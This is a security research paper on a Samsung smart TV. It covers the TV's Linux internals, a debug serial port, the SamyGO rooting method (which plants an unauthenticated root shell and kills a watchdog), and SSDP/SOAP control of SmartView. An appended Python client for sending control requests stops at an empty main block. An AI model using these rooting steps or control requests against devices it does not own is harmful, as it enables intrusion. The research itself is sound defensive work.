ABSTRACT


Smart home devices are becoming increasingly popular. Sales of 
smart TVs alone are expected to increase to 141 million units in 
2015. This number may be small when compared with sales of 
PCs and mobile devices, but it is an impressive indication of 
what's to come. And it's not only our TVs that are getting 
smarter; our refrigerators, surveillance systems and thermostats 
are becoming ‘smart’ too. They are connected to the Internet. 
They are in the cloud. They have more functionality than ever 
before, and they're making our lives easier. At the same time, they may
also be providing new opportunities for crime.


The current upward trend in smart appliance adoption might 
resemble similar historic trends seen with PCs and smartphones. 
At this early stage of the adoption process, we might think that 
the smart devices in our home are safe, but what do we really 
know about them? They are like black boxes and there is very 
little information available about their internals. Worryingly, 
what little published research exists in this area suggests our 
confidence may be misplaced. 


Maybe we won't see prevalent malware on these platforms in the 
near future, but this is not because smart appliances aren't prone 
to attack. It is more about the current expected ROI for malware 
writers. The market for smart appliances isn't even remotely 
close to saturation at this point, so the potential number of 
targets, and therefore incentive to compromise, remains 
relatively low. However, this gives us a good opportunity to think 
about the security of these smart devices and get ahead of the 
game. We can learn important lessons from the history of PCs, 
smartphones and malware. 


In this paper, we discuss the current security status of popular 
smart home appliances (TVs, thermostats and surveillance 
cameras). We share our findings from reverse engineering those 
devices and analysing their defences, including noting possible 
attacks or vulnerabilities (such as memory corruptions, MITM 
issues, etc.). We also elaborate on possible ways to mitigate 
future threats on these increasingly popular platforms. 


INTRODUCTION 


Smart home appliances are becoming increasingly popular as the 
trend of everything being connected continues apace. These 
interconnections, moderated by our mobile devices or networked 
PCs, make our lives more convenient and productive — and this is 
just the start. Imagine the possibilities if you could control and 
monitor all your intelligent appliances and home equipment 
remotely. 


But we might be missing something here. We have put a strong
emphasis on PC and mobile phone security, and many measures,
including anti-malware, have been developed to defeat malicious
software and exploits. Vendors like Microsoft, Apple and Google
have put significant effort and resources into making their
products and the ecosystem more secure. The positive cycle of
bug reporting, fixing and crediting is mostly stable in this space.
But smart home appliances, such as smart TVs and smart
refrigerators, are manufactured by large vendors who are not
familiar with the software industry and its established security
best practices. Then there are other, smaller vendors who have
great ideas as to how to make life easier with many different
Internet-enabled devices, but security may not be at the forefront
of their minds. Neither of these groups has the experience in
security that forged the current policies for addressing
vulnerabilities and malware in the more conventional IT space.


ANALYSIS TARGET 


Among the growing number of smart appliances, smart TVs have 
shown very impressive sales recently and are projected to 
increase to 141 million units worldwide in 2015 [1]. This 
number is still small compared to the number of PCs and mobile 
devices being sold, but it is a number we can't ignore. For this 
paper, I picked one smart TV model (Samsung F-series) as a 
case study and performed a detailed security assessment. In this 
paper I discuss the attack vectors from the point of view of the 
attackers and malware creators. Hopefully this will give you a 
glimpse into the state of security in this space. 


The target device I chose was a 55UF6350 model purchased
from a US retail store in 2013. In other words, it is very typical of the
sort of TV you might purchase nowadays. This model is usually
called an F-series (most of the Samsung TV models sold in 2013
fall into this category). Table 1 shows the basic features of this
TV. From the specification alone, it sounds almost like a
small computer with a huge screen.


Feature                      Value

Processor                    Dual core (ARMv7)
Screen size                  55"
AllShare                     Content sharing and screen mirroring
SmartView                    Clone view
Smart phone remote support   Yes (requires SmartView app)
USB HID support              Yes
Motion rate                  240
Network                      One built-in wireless adapter
Browser                      WebKit-based with Flash 11.1 support (ActionScript 3.0)
Installed apps               Netflix, Picasa, Skype, YouTube, Facebook

Table 1: Features of Samsung TV model 55UF6350.


INTERNALS 


The TV runs a Linux operating system, as illustrated in Figure 1,
which shows the dmesg command result from the TV. There's
some interesting information here, like the memory size of
616MB total and an ARMv7 CPU. The machine doesn't look as
powerful as a PC; it feels more like an embedded Linux system.
Note also the kernel command line: the kernel is 3.0.33 and the
root file system is a squashfs image on an eMMC partition
(root=/dev/mmcblk0p10 rootfstype=squashfs).

Initializing cgroup subsys cpu
Linux version 3.0.33 (nwlee@sp2) (gcc version 4.6.4 (VDLinux.GA1.2012-10-03) ) #1 SMP PREEMPT Fri Aug 2 20:57:36 KST 2013
CPU: ARMv7 Processor [413fc090] revision 0 (ARMv7), cr=18c53c7d
CPU: VIPT nonaliasing data cache, VIPT aliasing instruction cache
Machine: edison
MEM = 0x40200000, 0xC600000
MEM2 = 0xA5E00000, 0x1A200000
Memory policy: ECC disabled, Data cache writealloc
On node 0 totalpages: 157696
  Normal zone: 4092 pages used for memmap
  Normal zone: 0 pages reserved
  Normal zone: 153604 pages, LIFO batch:31
PERCPU: Embedded 7 pages/cpu @c0c1a000 s4992 r8192 d15488 u32768
Built 1 zonelists in Zone order, mobility grouping on.  Total pages: 153604
Kernel command line: console=ttyS1,115200 root=/dev/mmcblk0p10 rootfstype=squashfs MEM=0x40200000,0xC600000 MEM2=0xA5E00000,0x1A200000 EMAC_MEM=0x40000000,0x100000 ... SELP_ENABLE=20139120 quiet
PID hash table entries: 4096 (order: 2, 16384 bytes)
Dentry cache hash table entries: 131072 (order: 7, 524288 bytes)
Inode-cache hash table entries: 65536 (order: 6, 262144 bytes)
Memory: 198MB 418MB = 616MB total
Memory: 620016k/620016k available, 10768k reserved, 0K highmem
Virtual kernel memory layout:
    vector  : 0xffff0000 - 0xffff1000   (   4 kB)
    fixmap  : 0xfff00000 - 0xfffe0000   ( 896 kB)
    DMA     : 0xffc00000 - 0xffe00000   (   2 MB)
    vmalloc : 0xe7000000 - 0xf8000000   ( 272 MB)
    lowmem  : 0xc0000000 - 0xe6800000   ( 616 MB)
    modules : 0xbf000000 - 0xc0000000   (  16 MB)
      .init : 0xc0008000 - 0xc0028000   ( 128 kB)
      .text : 0xc0028000 - 0xc033e000   (3160 kB)
      .data : 0xc033e000 - 0xc035b040   ( 117 kB)
       .bss : 0xc035b064 - 0xc040e5d4   ( 718 kB)
SLUB: Genslabs=11, HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1
Preemptible hierarchical RCU implementation.
  Verbose stalled-CPUs detection is disabled.
NR_IRQS:256
Global Timer Frequency = 498 MHz
CPU Clock Frequency = 996 MHz
sched_clock: 32 bits at 498MHz, resolution 2ns, wraps every 8624ms
Console: colour dummy device 80x30
console [ttyS1] enabled

Figure 1: The dmesg command result from the TV (excerpt; lines that did not survive extraction are omitted).

Figure 2 shows the mount command result with a number of
partitions mounted on the system. Of the multiple partitions
mounted, some are mounted read-only and some are mounted
read-write. The read-only ones are squashfs images, and the
widget (app) images are loop-mounted squashfs with noexec; the
read-write areas (/mtd_rwarea, /mtd_rwcommon, /mtd_contents,
etc.) are emmcfs partitions.

rootfs on / type rootfs (rw)
/dev/root on / type squashfs (ro,relatime)
tmpfs on /dtv type tmpfs (rw,relatime,size=40960k)
... type tmpfs (rw,relatime,size=2048k)
none on /sys/fs/cgroup type cgroup (rw,relatime,cpu)
... type emmcfs (ro,relatime)
/dev/mmcblk0p17 on /mtd_exe type squashfs (ro,relatime)
/dev/mmcblk0p16 on /mtd_rwarea type emmcfs (rw,relatime)
/dev/mmcblk0p14 on /mtd_drmregion_a type emmcfs (rw,relatime)
/dev/mmcblk0p15 on /mtd_drmregion_b type emmcfs (rw,relatime)
... on /mtd_rocommon type squashfs (ro,noexec,relatime)
/dev/mmcblk0p24 on /mtd_contents type emmcfs (rw,relatime)
none on /proc/bus/usb type usbfs (rw,relatime)
/dev/mmcblk0p26 on /mtd_rwcommon type emmcfs (rw,relatime)
/dev/loop0 on /mtd_rwcommon/widgets/manager/10130000000 type squashfs (ro,noexec,relatime)
/dev/mmcblk0p23 on /mtd_emanual type emmcfs (rw,relatime)
/dev/mmcblk0p25 on /mtd_swu type emmcfs (rw,relatime)
/dev/loop4 on /mtd_rwcommon/widgets/normal/111199001564 type squashfs (ro,noexec,relatime)
/dev/loop5 on /mtd_rwcommon/widgets/normal/111199000674 type squashfs (ro,noexec,relatime)

Figure 2: The mount command result from the TV.

Figure 3 shows the ps command result. One interesting process
is X, the X Window server. There are other interesting processes
too, like udhcpc (a DHCP client) and WebKitWebProcess (a
WebKit rendering process). The process exeAPP (also shown in
the figure) is responsible for app-related operations overall, and
the process exeTV is responsible for showing television
programs. Note also that every listed process, including the
browser processes and the lighttpd web server, runs as root.

shell>ps -eaf
PID USER TIME COMMAND
    1 root 0:00 init
    2 root 0:00 [kthreadd]
    3 root 0:00 [ksoftirqd/0]
    5 root 0:00 [kworker/u:0]
    6 root 0:00 [migration/0]
    7 root 0:00 [migration/1]
   10 root 0:00 [khelper]
   11 root 0:00 [sync_supers]
   12 root 0:00 [bdi-default]
   13 root 0:00 [kblockd]
   16 root 0:00 [kswapd0]
   17 root 0:00 [fsnotify_mark]
   18 root 0:00 [vdbinder]
   19 root 0:00 [kworker/0:1]
   20 root 0:09 [mmcqd/0]
   21 root 0:00 [mmcqd/0boot0]
   22 root 0:00 [mmcqd/0boot1]
   25 root 0:00 [kworker/1:1]
   34 root 0:00 -/bin/sh
   60 root 0:00 [kworker/1:2]
   63 root 0:00 [khubd]
   66 root 0:00 {exe} ash /mtd_exe/rc.local
   69 root 0:00 ./servicemanager_csp -vdbinder
   88 root 2:25 ./exeAPP -vdbinder
   89 root 2:02 ./exeTV -vdbinder
  226 root 0:01 /mtd_appdata/Runtime/bin/X -logfile /mtd_rwarea/xlog.txt -modulepath /mtd_appdata/Runtime/xor
  231 root 0:00 Compositor -vdbinder
  262 root 0:00 [kworker/0:3]
  304 root 0:00 /mtd_commlib/WIFI_LIB/QCA/wpa_supplicant -Dnl80211 -ip2p0 -c/mtd_rwarea/network/p2p_dual.conf
  328 root 0:00 [flush-179:0]
  350 root 0:00 [loop0]
  392 root 0:00 udhcpc -i wlan0 -t 5 -T 5 -b
  395 root 0:04 /mtd_appext/widgetEngine/widgetEngine
  533 root 0:00 [kworker/u:3]
  536 root 0:15 .../widgets/normal/20131000001/bin/BrowserLauncher
  652 root 0:08 .../emps/empWebBrowser/bin/WebKitWebProcess 13
  671 root 0:20 /mtd_exe/Webkit/WebKitWebProcess 12
  920 root 0:00 /mtd_exe/webServerApp/bin/lighttpd -D -f /mtd_exe/webServerApp/webserver/lighttpd.conf -s
 1107 root 0:00 [loop4]
 1232 root 0:00 [loop5]
 1477 root 0:00 ./MainServer /mtd_rwarea/yahoo
 1525 root 0:00 ./PDSServer
 1526 root 0:00 ./AppUpdate com.yahoo.connectedtv.updater
 1541 root 0:01 ./BIServer com.yahoo.connectedtv.samsungbi

Figure 3: The ps -eaf command result from the TV (excerpt; entries that did not survive extraction are omitted).


Table 2 shows some of the TCP ports on the system, the related
processes and their usage. The exeAPP process listens on many
ports, including 55000 and 55001; these ports are used by the
SmartView application. The other SOAP-related ports, served by
lighttpd, are mostly for Universal Plug and Play (UPnP)
operations. UPnP is a set of network protocols that enables
devices on a network to discover each other and invoke each
other's services without manual configuration.

Protocol  Port   Process   Usage
TCP       6000   X         X Window System
TCP       55000  exeAPP    SmartView
TCP       55001  exeAPP    SmartView
TCP       9090   exeAPP    SmartView
TCP       7676   exeAPP    SOAP
TCP       80     lighttpd  SOAP
TCP       4443   lighttpd  SOAP
TCP       443    lighttpd  SOAP

Table 2: Ports of interest on the TV.


Information source 


For Samsung TV rooting resources and other general 
information, the Samygo forum (http://www.samygo.tv/) is very 
useful. A lot of information from independent hobbyists is 
accumulated here. 


Figure 4: Samygo forum. Threads visible in the screenshot:
  Get ROOT access on F-series without develop account (m2tk, Sun Nov 24, 2013)
  T-FXPDEUC-1115.0 is safe (Lordbyte, Fri Feb 14, 2014)
  FW 1118.2 for F6xxx models (sandan, Thu Feb 13, 2014)
  Firmware download list for F Series (T-FXP9DEUC) (RadMyRad, Sun Feb 16, 2014)
  [How To] Get root access on F series (juzis, Fri Jul 19, 2013)
  Samygo Widget install failed (xanders31, Fri Nov 01, 2013)


Debug port access 


Most embedded devices allow technicians to access the firmware
through hardware interfaces like JTAG or UART ports. In most
cases, the vendor doesn't want end-users to abuse the feature, so it is
common for the interfaces to be obfuscated. The Samsung TV is
known to use a modified version of a serial port called
EX-LINK (Figure 5).


Figure 5: EX-LINK port on the back of the TV. 


The schematics for the EX-LINK cable are shown in Figure 6. 
At one end of the cable is a DB9 female connector, and the other 
end uses a stereo audio plug interface. You can easily make a 
cable by combining a DB9 cable and a stereo audio jack cable. 


Figure 6: EX-LINK cable schematics (source: [2]). The drawing wires DB9 pins 2, 3 and 5 to the three contacts of the stereo plug (wires labelled white, red and spiral).


After building an EX-LINK cable, you need to enable debug 
mode from the TV. As shown in Figure 7, EX-LINK is 
configured in UART mode by default. This needs to be changed 
to debug mode, as shown in Figure 8. 


If everything is working well, you will see a screen similar to 
that shown in Figure 9. More detailed log messages are shown 
in Figure 10. A lot of debug messages from the system processes 
are displayed, which is very helpful when reverse engineering 
system features. Also, with special key sequences, you can gain 
access to the Top-Debug-Menu (TDM). Through the TDM, you 
can control sensitive features of the TV at a very low level. Most 
of this information is available from the Samygo forum. 


Rooting 


To research smart TV internals, gaining access to the system
shell is essential. To achieve that, I used the SamyGO rooting
app. Interestingly, the way this app works implies a weakness
in a Samsung TV security feature.


First, you download the SamyGO rooting package from the
Samygo forum site and put the package on a USB thumb stick.
From the TV, go into the 'More Apps' menu. When you plug in
your USB stick, the SamyGO application appears in the
application list. Figure 11 shows the application icon with the
name 'SamyGO-F' on the screen.

Figure 7: RS-232 jack is in UART mode by default.

Figure 10: Detailed debug messages from the TV (ControlPanel and NET_MW log lines reporting wpa_supplicant events, the WPA state and the P2P device address).

Figure 11: SamyGO rooting app (the More Apps screen with the SamyGO-F entry, version 2.0, size 1.16MB, listed among Netflix, Pandora, Facebook and the other installed apps).


Table 3 shows the files inside the SamyGO app. Essentially, a 
TV app is just a ZIP archive file with HTML, JavaScript and 
additional files inside. Samsung TV apps are written in HTML 
and JavaScript. The main code that does the rooting is inside 
index.html and JavaScript\Main.js. 


Name                  Description

widget                Basic widget information (resolution, alpha blending usage)
config.xml            Program configuration (widget id, name, description, etc.)
index.htm             Main HTML file loaded
JavaScript\Main.js    Main exploit file in JavaScript code
data\patch            Main patch file (zip format)
icon\samygo.jpg       Program icons
icon\samygo_106.png
icon\samygo_115.png
icon\samygo_85.png
icon\samygo_95.png
CSS\Main.css          CSS file

Table 3: Main program structure.


The data\patch file is actually a ZIP archive that contains the
files shown in Table 4. The remoteSamyGO.zip file inside it is
another ZIP archive that contains ELF binaries and a shell
script that are installed on the target machine (Table 5).
libSkype.so is a file that replaces the original Skype shared
library with a file of the same name.


Name               Description

AutoStart          Dummy AutoStart file
libSkype.so        Skype hooking library file
remoteSamyGO.zip   Main SamyGO package file
runSamyGO.sh       SamyGO package run script

Table 4: Patch file structure.


Name            Description

busybox         Busybox package (including shell, FTP and various other utilities)
remshd          Remote shell
UEP_killer.sh   UEP killer

Table 5: remoteSamyGO.zip file structure.


The busybox file is a small binary containing many different
functions, including a shell and FTP. The remshd file is an ELF
binary that listens on port 23 and hands out a shell to anyone
who connects to the port; since the rooting process runs as root,
that is an unauthenticated root shell reachable by any host on the
same network. The UEP_killer.sh file is a shell script that
kills a watchdog process on the system that blocks unauthorized
processes (killing the watchdog process disables this security
feature).


When the program is run, it displays a screen similar to that 
shown in Figure 12. It overwrites Skype's shared library file 
(libSkype.so) with its own version. Whenever Skype runs on the 
TV, the main Skype binary loads this replaced shared library and 
runs the SamyGO app's code inside it. The shared library runs 
its own code for installing a remote shell and providing other 
features. 


Figure 12: Rooting process from the rooting program (the screen lists the detected USB device, a Kingston DataTraveler 2.0, followed by the 'Setup SamyGO' progress messages).


How rooting works and its security implications 


You might be wondering how this rooting process is possible. 
The cause of the problem is that when a USB stick is inserted, 
the More Apps feature does not verify the applications on the 
USB drive — it skips the application verification process and lets 
the user run the program(s). Moreover, the process has root 
privileges. The TV apps are written in HTML and JavaScript, 
and the underlying system exposes JavaScript objects that 
support network, display and file system access, etc. 


The SamyGO app first loads the SAMSUNG-INFOLINK- 
FILESYSTEM object, as shown at line 11 in Figure 13. 
Through this object, the JavaScript code can perform file- 
system-related operations. After that, as shown at line 15 in 
Figure 13, the HTML page calls the Main.onLoad JavaScript. 


Figure 14 shows that the filePlugin variable is resolved from the
previously loaded SAMSUNG-INFOLINK-FILESYSTEM object.


Line 156 in Figure 15 shows how the Unzip method from this 
object can be used. Basically, you can extract an arbitrary ZIP 
file to an arbitrary folder. 
Figure 13: index.htm of the SamyGO app. Line 11 loads the SAMSUNG-INFOLINK-FILESYSTEM plugin object (a SAMSUNG-INFOLINK-STORAGE object is loaded next to it) and line 15 calls Main.onLoad.

Figure 14: Main.onLoad resolves filePlugin with document.getElementById.

Figure 15: Main.js. The unzip() function builds a command string and passes it to eval(); the root() function references /runSamyGO.sh and /remoteSamyGO.zip from the extracted patch.

Figure 16: Target location of the ZIP operation (the Skype engine's directory).


The target location for the ZIP operation is shown in Figure 16.
This path is where the Skype engine's files, including the shared
library, are stored.

The rootSamyGO function from the script extracts the
'data/patch' file to the Skype engine's location, overwriting the
libSkype.so file. Now, when the Skype program runs on the
system, it loads the SamyGO version of the libSkype.so shared
library.


SMARTVIEW FLAW 


SmartView is a feature of Samsung TVs that lets you enjoy TV 
content from your PC or smart phone. An iPhone app (Figure 
18) and a PC application (Figure 19) are available. The 
SmartView feature is related to other features like AllShare, etc. 



Figure 18: SmartView iPhone App. 
Figure 19: SmartView PC application (showing the discovered TV as '[TV] Samsung LED55').


Frame  Time         Date       Time Offset  Process Name       Source        Destination      Protocol  Description
3      11:23:11 AM  5/25/2014  0.0128345    SmartView.App.exe  192.168.1.19  239.255.255.250  SSDP      SSDP:Request, M-SEARCH *
7      11:23:11 AM  5/25/2014  0.3124502    SmartView.App.exe  192.168.1.19  239.255.255.250  SSDP      SSDP:Request, M-SEARCH *
10     11:23:12 AM  5/25/2014  0.6126393    SmartView.App.exe  192.168.1.19  239.255.255.250  SSDP      SSDP:Request, M-SEARCH *
71     11:23:18 AM  5/25/2014  7.0008754    SmartView.App.exe  192.168.1.19  239.255.255.250  SSDP      SSDP:Request, M-SEARCH *
73     11:23:18 AM  5/25/2014  7.3011188    SmartView.App.exe  192.168.1.19  239.255.255.250  SSDP      SSDP:Request, M-SEARCH *
75     11:23:19 AM  5/25/2014  7.6011015    SmartView.App.exe  192.168.1.19  239.255.255.250  SSDP      SSDP:Request, M-SEARCH *

Figure 20: M-SEARCH packets.


M-SEARCH * HTTP/1.1
MAN: "ssdp:discover"
MX: 4
CONTENT-LENGTH: 0
HOST: 239.255.255.250:1900
ST: urn:samsung.com:device:RemoteControlReceiver:1

Figure 21: M-SEARCH packet payload.


Frame  Time         Date       Time Offset  Process Name       Source       Destination   Protocol  Description
5      11:23:11 AM  5/25/2014  0.1208583    SmartView.App.exe  192.168.1.9  192.168.1.19  UDP       UDP:SrcPort = 57480, DstPort = 1026, Length = 354

Figure 22: M-SEARCH response.


The SmartView feature is representative of smart TVs with 
network capability. Looking into how this feature works is 
interesting, as well as a beneficial exercise in order to gain a 
better understanding of the security implications of some 
features of smart TVs. 


SSDP 


Simple Service Discovery Protocol (SSDP [3]) is used for
discovering and propagating device information on the local
network. The SmartView application sends M-SEARCH
requests to the SSDP multicast address (Figure 20).


The payload of the M-SEARCH packets is shown in Figure 21. 
It tries to find Samsung remote control receiver devices. 

The TV replies with additional information about itself using 
the SSDP protocol (Figure 22). 


Figure 23 shows the contents of this reply packet. It has a
'LOCATION' header that can be used for further operations.
The URL is 'http://192.168.1.9:7676/smp_2_' and the IP
address of the TV is 192.168.1.9.

HTTP/1.1 200 OK
CACHE-CONTROL: max-age=1800
Date: Thu, 01 Jan 1970 01:00:36 GMT
EXT:
LOCATION: http://192.168.1.9:7676/smp_2_
SERVER: SHP, UPnP/1.0, Samsung UPnP SDK/1.0
ST: urn:samsung.com:device:MainTVServer2:1
USN: uuid:0a21fe80-00aa-1000-bb3d-f47b5e7620f8::urn:samsung.com:device:MainTVServer2:1
Content-Length: 0

Figure 23: M-SEARCH response payload.


Basic information request

From the response to the M-SEARCH request, the client can
determine the URL for more operations. It tries to connect to
and request information from the TV by sending a simple GET
request to this URL (Figure 24).


GET /smp_2_ ...
USER-AGENT: SEC_HHP_CRAZYCOOKIE/1.0
ACCEPT-LANGUAGE: en-us

Figure 24: Smp_2_ application request (only the headers that survived extraction are shown).


The result of this GET request is shown in Figure 25. The
message contains basic device information, including the model
name and a detailed description of the device. Also note that
there is a service entry named urn:samsung.com:serviceId:
MainTVAgent2. The entry has a controlURL of /smp_4_. This
URL is where the client can perform additional SOAP
operations.

HTTP/1.1 200 OK
CONTENT-LANGUAGE: UTF-8
CONTENT-TYPE: text/xml; charset="utf-8"
CONTENT-LENGTH: 1...
Date: Thu, 01 Jan 1970 01:00:38 GMT
connection: close
SERVER: SHP, UPnP/1.0, Samsung UPnP SDK/1.0

<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0" xmlns:sec="http://www.sec.co.kr/dlna">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<device>
<deviceType>urn:samsung.com:device:MainTVServer2:1</deviceType>
<friendlyName>[TV]Samsung LED55</friendlyName>
<manufacturer>Samsung Electronics</manufacturer>
<manufacturerURL>http://www.samsung.com</manufacturerURL>
<modelDescription>Samsung DTV MainTVServer2</modelDescription>
<modelName>UN55F6300</modelName>
<modelNumber>1.0</modelNumber>
<modelURL>http://www.samsung.com</modelURL>
<serialNumber>20100621</serialNumber>
<UDN>uuid:0a21fe80-00aa-1000-bb3d-f47b5e7620f8</UDN>
<UPC>123456789012</UPC>
<sec:deviceID>BDCHCBZODCVXU</sec:deviceID>
<sec:ProductCap>Browser,Y2013</sec:ProductCap>
<serviceList>
<service>
<serviceType>urn:samsung.com:service:MainTVAgent2:1</serviceType>
<serviceId>urn:samsung.com:serviceId:MainTVAgent2</serviceId>
<controlURL>/smp_4_</controlURL>
<eventSubURL>/smp_5_</eventSubURL>
<SCPDURL>/smp_3_</SCPDURL>
</service>
</serviceList>
</device>
</root>

Figure 25: Smp_2_ application response.


Advanced operations

smp_4_ is a SOAP application that provides additional
operations. Figure 26 shows one of the requests: it is sending a
GetDTVInformation request to the TV using a SOAP message.

The response to the GetDTVInformation request is shown in
Figure 27. The response contains basic information about the
features the TV supports. It includes the video formats it
supports, the TV version, and the presence of additional
networking ports like Bluetooth.

There are many different services available through this
application, including the following functions:

* AddSchedule
* ChangeSchedule
* DeleteRecordedItem
* DeleteSchedule
* DestroyGroupOwner
* EnforceAKE
* GetACRCurrentChannelName
* GetACRCurrentProgramName
* GetACRMessage
* GetAPInformation
* GetAllProgramInformationURL
* GetAvailableActions
* GetBannerInformation
* GetChannelListURL
* GetCurrentBrowserMode
* GetCurrentBrowserURL
* GetCurrentExternalSource
* GetCurrentMainTVChannel
* GetCurrentProgramInformationURL
* GetDTVInformation
* GetDetailProgramInformation
* GetFilteredProgramURL
* GetMBRDeviceList
* GetMBRDongleStatus
* GetRecordChannel
* GetScheduleListURL
* GetSourceList
* PlayRecordedItem
* RunBrowser
* SendBrowserCommand
* SendMBRIRKey
* SetAntennaMode
* SetMainTVChannel
* SetMainTVSource
* SetRecordDuration
* StartCloneView
* StartInstantRecording
* StopBrowser
* StopRecord
* StopView

Note that many of these are not read-only queries: RunBrowser,
SendBrowserCommand, SetMainTVChannel, SetMainTVSource,
StartInstantRecording and SendMBRIRKey all change what the TV
is doing.

POST /smp_4_ HTTP/1.0
HOST: 192.168.1.9:7676
CONTENT-LENGTH: 248
CONTENT-TYPE: text/xml;charset="utf-8"
USER-AGENT: DLNADOC/1.50 SEC_HHP_CRAZYCOOKIE/1.0
SOAPACTION: "urn:samsung.com:service:MainTVAgent2:1#GetDTVInformation"

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetDTVInformation xmlns:u="urn:samsung.com:service:MainTVAgent2:1"></u:GetDTVInformation></s:Body></s:Envelope>

Figure 26: Smp_4_ application request.

HTTP/1.1 200 OK
Content-Length: 1594
Content-Type: text/xml; charset="utf-8"
DATE: Thu, 01 Jan 1970 01:00:40 GMT

<?xml version="1.0" encoding="utf-8"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body><u:GetDTVInformationResponse xmlns:u="urn:samsung.com:service:MainTVAgent2:1"><Result>OK</Result><DTVInformation>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt; ... &lt;SupportAntMode&gt;1,2&lt;/SupportAntMode&gt;&lt;SupportChSort&gt;No&lt;/SupportChSort&gt;&lt;SupportChannelInfo&gt;No&lt;/SupportChannelInfo&gt; ...

Figure 27: Smp_4_ application response (excerpt; the embedded DTVInformation document is only partly legible).
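The discovery and control exchange described under SSDP, Basic information request and Advanced operations, as an added example (not code from the paper or from Samsung): it builds the M-SEARCH of Figure 21, parses the SSDP reply of Figure 23 for its LOCATION header, pulls the MainTVAgent2 controlURL out of the device description of Figure 25 and builds the SOAP POST of Figure 26 for any action name. The function names, the sample messages (constructed from the figures, not live captures) and the optional `discover()` helper are this example's own; the URNs, headers and URLs are the ones shown in the figures.

```python
"""SSDP discovery and UPnP/SOAP requests for the Samsung MainTVAgent2 service.

Added example for this page (not code from the paper or from Samsung). It
rebuilds the exchange of Figures 21-26: the M-SEARCH the SmartView client
multicasts, the SSDP reply carrying LOCATION, the device description that
names the controlURL, and the SOAP POST to that URL. The sample messages
below are constructed from the figures; discover() is the only function
that touches the network and is never called by the tests.
"""
import socket
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

SSDP_ADDR = ("239.255.255.250", 1900)
REMOTE_ST = "urn:samsung.com:device:RemoteControlReceiver:1"
UPNP_NS = {"d": "urn:schemas-upnp-org:device-1-0"}
AGENT_SERVICE = "urn:samsung.com:service:MainTVAgent2:1"
AGENT_SERVICE_ID = "urn:samsung.com:serviceId:MainTVAgent2"


def build_msearch(st: str = REMOTE_ST, mx: int = 4) -> bytes:
    """M-SEARCH request in the shape the SmartView client sends (Figure 21)."""
    lines = ["M-SEARCH * HTTP/1.1", 'MAN: "ssdp:discover"', f"MX: {mx}",
             "CONTENT-LENGTH: 0", f"HOST: {SSDP_ADDR[0]}:{SSDP_ADDR[1]}", f"ST: {st}"]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_ssdp_response(raw: bytes) -> Dict[str, str]:
    """Parse an SSDP reply (HTTP over UDP) into a dict keyed by upper-cased header name."""
    text = raw.decode("utf-8", errors="replace")
    status, _, rest = text.partition("\r\n")
    if not status.startswith("HTTP/1.1 200"):
        raise ValueError(f"unexpected SSDP status line: {status!r}")
    headers: Dict[str, str] = {}
    for line in rest.split("\r\n"):
        if not line.strip():
            break                      # blank line ends the header block
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers


def find_control_url(description_xml: str, service_id: str = AGENT_SERVICE_ID) -> Optional[str]:
    """Return the controlURL of service_id from a UPnP device description (Figure 25)."""
    root = ET.fromstring(description_xml)
    for svc in root.findall(".//d:serviceList/d:service", UPNP_NS):
        if svc.findtext("d:serviceId", default="", namespaces=UPNP_NS) == service_id:
            return svc.findtext("d:controlURL", default=None, namespaces=UPNP_NS)
    return None


def build_soap_request(host: str, control_url: str, action: str,
                       service_type: str = AGENT_SERVICE) -> bytes:
    """SOAP POST in the shape of Figure 26 for any argument-less MainTVAgent2 action."""
    body = ('<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
            's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
            f'<s:Body><u:{action} xmlns:u="{service_type}"></u:{action}></s:Body></s:Envelope>')
    headers = [f"POST {control_url} HTTP/1.0", f"HOST: {host}",
               f"CONTENT-LENGTH: {len(body)}", 'CONTENT-TYPE: text/xml;charset="utf-8"',
               "USER-AGENT: DLNADOC/1.50 SEC_HHP_CRAZYCOOKIE/1.0",
               f'SOAPACTION: "{service_type}#{action}"']
    return ("\r\n".join(headers) + "\r\n\r\n" + body).encode("utf-8")


def discover(timeout: float = 4.0) -> List[Dict[str, str]]:
    """Multicast one M-SEARCH and collect parsed replies (live network; optional)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.settimeout(timeout)
    sock.sendto(build_msearch(), SSDP_ADDR)
    found: List[Dict[str, str]] = []
    try:
        while True:
            data, _ = sock.recvfrom(4096)
            found.append(parse_ssdp_response(data))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return found


# Constructed from Figure 23; not a live capture.
SAMPLE_SSDP_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=1800\r\n"
    b"Date: Thu, 01 Jan 1970 01:00:36 GMT\r\nEXT:\r\n"
    b"LOCATION: http://192.168.1.9:7676/smp_2_\r\n"
    b"SERVER: SHP, UPnP/1.0, Samsung UPnP SDK/1.0\r\n"
    b"ST: urn:samsung.com:device:MainTVServer2:1\r\n"
    b"USN: uuid:0a21fe80-00aa-1000-bb3d-f47b5e7620f8::urn:samsung.com:device:MainTVServer2:1\r\n"
    b"Content-Length: 0\r\n\r\n")

# Constructed from Figure 25 (abbreviated); not a live capture.
SAMPLE_DESCRIPTION = """<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0" xmlns:sec="http://www.sec.co.kr/dlna">
<device><deviceType>urn:samsung.com:device:MainTVServer2:1</deviceType>
<friendlyName>[TV]Samsung LED55</friendlyName><modelName>UN55F6300</modelName>
<serviceList><service>
<serviceType>urn:samsung.com:service:MainTVAgent2:1</serviceType>
<serviceId>urn:samsung.com:serviceId:MainTVAgent2</serviceId>
<controlURL>/smp_4_</controlURL><eventSubURL>/smp_5_</eventSubURL><SCPDURL>/smp_3_</SCPDURL>
</service></serviceList></device></root>"""

if __name__ == "__main__":
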